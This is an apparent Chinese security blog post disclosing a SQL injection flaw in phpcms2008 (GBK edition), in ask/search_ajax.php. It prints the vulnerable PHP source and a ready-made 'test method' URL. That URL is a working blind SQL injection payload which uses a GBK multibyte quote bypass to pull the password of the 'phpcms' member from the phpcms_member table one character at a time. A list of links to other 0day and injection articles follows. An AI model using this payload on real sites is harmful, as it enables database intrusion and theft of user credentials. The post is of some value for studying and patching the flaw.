大西瓜的杂货铺

From:Nuke

受影响程序： phpcms2008 gbk

漏洞文件：ask/search_ajax.php

code：

<?php
require ‘./include/common.inc.php’;
require_once MOD_ROOT.’include/ask.class.php’;
$ask = new ask();
header(‘Content-type: text/html; charset=utf-8′);
if(strtolower(CHARSET) != ‘utf-8′) $q = iconv(CHARSET, ‘utf-8′, $q);
if($q)
{
$where = ” title LIKE ‘%$q%’ AND status = 5″;
}
else
{
exit(‘null’);
}
$infos = $ask->listinfo($where, ‘askid DESC’, ”, 10);

foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, ‘<span class=”c_orange”>’.$q.’</span>’, $val['title']);
$info[$key]['title'] = CHARSET != ‘utf-8′ ? iconv(CHARSET, ‘utf-8′, $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}

echo(json_encode($info));
?>

测试方法：
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

相关文章

• 睛天电影系统注入漏洞
• Dvbbs 8.2 SQL injection 0day
• Windows出新0day了
• nginx 0day漏洞 上传图片可入侵百万台服务器
• 百度游戏的一些安全隐患
• 比较有效率的openrowset读表方案
• 暴风影音的最新0DAY_2010.05.06
• SFX-SQLi version 1.1.3.22
• 关于微软IE浏览器存在一个零日高危漏洞的情况通报
• Hacking Oracle from the Web